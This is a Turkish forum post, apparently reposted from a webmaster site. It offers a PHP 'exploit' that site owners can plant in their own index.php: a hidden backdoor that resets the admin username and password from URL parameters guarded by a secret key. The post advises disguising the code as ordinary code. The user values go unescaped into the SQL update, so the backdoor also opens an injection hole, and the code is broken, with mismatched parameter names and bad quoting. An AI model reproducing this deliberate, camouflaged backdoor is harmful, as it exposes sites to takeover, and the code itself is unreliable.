İstanbul Düğün Fotoğrafçısı

İstanbul Düğün Fotoğrafçısı Fiyatları
 
AnasayfaSSSAramaKayıt OlGaleriGiriş yap

Paylaş | 
 

 Sitenize Exploit Açmak

Aşağa gitmek 
YazarMesaj
Ckmk
Admin
Admin
avatar

Cinsiyet : Erkek
Mesaj Sayısı : 6844
PUAN : 34632
Tebrikler : 65
Kayıt tarihi : 14/10/09
Yaş : 28
Nerden Nerden : istanbul
Lakap Lakap : Admin

Altın
Wwe Birinciliklerim:

MesajKonu: Sitenize Exploit Açmak   Çarş. Eyl. 07, 2011 10:30 pm

sitenize exploit açmak
Kod:
<div id="post_message_7701"> <div class="linkzarea">evet size kendi yazdığım bir scripti yazıyorum. bu daha &#246;nce aklıma gelmişti fakat tam olarak nasıl yapabileceğimi kuramamıştım.<br> <br>
exploit dediğimiz şey sitelerdeki a&#231;ıklardan bazılarıdır. sitede programcı farkında olmadan bir a&#231;ık bırakır ve hackerler bu a&#231;ıktan i&#231;eriye sızarlar falan feşmekan..<br> <br>
bu script bir &#231;eşit g&#252;venlik ama&#231;lıdır. neticede yazdığınız script sayfa i&#231;erisinde g&#246;r&#252;nmeyecektir (php olmasından dolayı) fakat eğer kişi sitenize ftp den girmişse yapabileceğiniz fazla bişey kalmaz a&#231;ık&#231;ası <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
dediğim gibi sitemize sadece kendi bildiğimiz bulunması zor bir exploid koyarsak sitemiz hacklenme durumunda bilgilerimizi geri alabiliriz. tabi kimseye s&#246;ylememeniz en yararlısıdır <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
bu tam bir script değildir. benimkisi b&#252;y&#252;k &#246;l&#231;&#252;de bir fikirdir, php bilirseniz kodlamak size kalmış <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
tabi bunun i&#231;in scripti ya kendiniz yazmış olmalısınız ya da veritabanı (mysql) yapısını &#231;ok iyi biliyor olmalısınız <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
&#246;rnek bir exploid a&#231;ığı: (mysql <linkz id="linkz1"><nobr><span style="font-weight: bold; line-height: 1.7;;color: #ff0000;border-bottom: 3px double #ff0000;cursor: pointer; cursor: hand;">bağlantılı</span></nobr></linkz> olsun)<br> <br> <div style="margin:20px; margin-top:5px"> <div class="smallfont" style="margin-bottom:2px">PHP- Kodu: # <input type="button" value="Kodları Seç"> <div class="alt2" dir="ltr" style="
      margin: 0px;
      padding: 6px;
      border: 1px inset;
      width: 640px;
      height: 418px;
      text-align: left;
      overflow: auto"> <code style="white-space:nowrap"> <pre><code><span style="color: #000000">
<span style="color: #0000BB"><?php
<br>$exploidkodu</span><span style="color: #007700">=</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #DD0000">"webmastersitesi.com"</span><span style="color: #007700">);
<br></span><span style="color: #0000BB">$disploid</span><span style="color: #007700">=</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"exploidgir"</span><span style="color: #007700">]);
<br> <br>if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"exploidgir"</span><span style="color: #007700">]) && isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"sifre"</span><span style="color: #007700">]) && isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"kullanici"</span><span style="color: #007700">]) && </span><span style="color: #0000BB">$exploidkodu</span><span style="color: #007700">==</span><span style="color: #0000BB">$disploid</span><span style="color: #007700">) 
<br>{
<br></span><span style="color: #0000BB">$sql</span><span style="color: #007700">=</span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"select * from users where userid=1"</span><span style="color: #007700">); 
<br> <br></span><span style="color: #0000BB">$kullanici</span><span style="color: #007700">=</span><span style="color: #0000BB">mysql_result</span><span style="color: #007700">(</span><span style="color: #0000BB">$sql</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #DD0000">"username"</span><span style="color: #007700">); </span><span style="color: #FF8000">//kullanıcı adını çektik
<br></span><span style="color: #0000BB">$sifre</span><span style="color: #007700">=</span><span style="color: #0000BB">mysql_result</span><span style="color: #007700">(</span><span style="color: #0000BB">$sql</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #DD0000">"pass"</span><span style="color: #007700">); </span><span style="color: #FF8000">//şifreyi çektik
<br> <br>//şifreyi çekmemiz işimize yaramayacaktır çünkü büyük ölçüde md5 ile oluşturulmuştur.
<br> <br></span><span style="color: #007700">echo </span><span style="color: #0000BB">$kullanici</span><span style="color: #007700">; </span><span style="color: #FF8000">//ekrana varolan admin adını yazdık (çok gerekli değil)
<br> <br>//ve en önemli kısım!!
<br> <br></span><span style="color: #0000BB">$sql_degistir</span><span style="color: #007700">=</span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"update users set 
<br>username="</span><span style="color: #007700">.</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"kullanici"</span><span style="color: #007700">].</span><span style="color: #DD0000">",
<br>pass="</span><span style="color: #007700">.</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"sifre"</span><span style="color: #007700">].</span><span style="color: #DD0000">",
<br>where userid=1"</span><span style="color: #007700">);
<br> <br>die();
<br>}
<br></span><span style="color: #0000BB">?></span>
</span>
</code></pre>  </code> </div> </div>şimdi ş&#246;yle birşey yazmış olduk.. diyelim ki bu kodu koyduğumuz sayfa index.php olsun ve &#252;yeler <linkz id="linkz2">bağlandığı</linkz> mysqldeki users tablosu i&#231;erisinde olsun.<br>
admin 1 <linkz id="linkz4">numaralı</linkz> olacaktır. dolayısıyla mysqlden 1 <linkz id="linkz3">numaralı</linkz> kullanıcının bilgilerini &#231;ekiyoruz. daha sonra kodu koyarken sadece bizim belirttiğimiz $exploidkodu kısmını belirlememiz gerekir ki bunu b&#246;yle yazmak aptallık olur <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/biggrin.gif" border="0" alt="" title=":D" class="inlineimg"> daha kamufle edersek arada gerekli bir kod gibi duracaktır <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
daha sonra yaptığımız şey ise bu usere ait bilgiyi değiştiriyoruz.. tabi exploit girersek <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"> bu durumda admin ismini şifresini ne yaparsa yapsın değiştirerek geri almış oluyoruz...<br> <br>
yani sitede adres kısmına ş&#246;yle birşey yaparsak bu <linkz id="linkz5">işlem</linkz> ger&#231;ekleşecektir:<br> <br> <div style="margin:20px; margin-top:5px"> <div class="smallfont" style="margin-bottom:2px">Kod: # <input type="button" value="Kodları Seç"> </div> <pre class="alt2" dir="ltr" style="
      margin: 0px;
      padding: 6px;
      border: 1px inset;
      width: 640px;
      height: 34px;
      text-align: left;
      overflow: auto">index.php?exploitgir=<linkz id="linkz6"><nobr><span style="font-weight: bold; line-height: 1.7;;color: #ff0000;border-bottom: 3px double #ff0000;cursor: pointer; cursor: hand;">webmastersitesi</span></nobr></linkz>.com&kullanici=yeniadminismi&sifre=yeniadminsifresi</pre> </div>kimilerince gereksiz g&#246;r&#252;lebilir ama kimi zaman yararlı olabilir <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
dediğim gibi bu scripti sitenize olduğu gibi koymayın.. &#231;alışmaz. ayrıca tehlike oluşturabilir.. sadece programlamada ilerlemiş kardeşlerimize bir fikir oluşturmak amacıyla yazdım <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"><br> <br>
umarım işine yarayan olur <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"> syntax error ettiysek affola <img style="max-width: 850px; cursor: pointer;" onclick="window.open(this.src)" src="http://www.webmastersitesi.com/images/smilies/smile.gif" border="0" alt="" title=":)" class="inlineimg"></div>  <div class="vbseo_buttons" id="lkbtn_1.3501.7701"> <div class="g-plusone"></div>  <div class="smallfont"> <hr size="1" style="color:#D1D1E1; background-color:#D1D1E1"> <em>
               
                  Konu Aurora tarafından (31-12-2007  <linkz id="linkz7">Saat</linkz> <span class="time">09:37</span> ) düzenlendi.
               
               
            </em> </div>  <div style="margin-top: 10px" align="right">  </div>  </div></div></div>


Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://dugunfotografcisi.yetkinforum.com
 
Sitenize Exploit Açmak
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
İstanbul Düğün Fotoğrafçısı :: Programlama :: Site Kodları :: Php Kodlar-
Buraya geçin: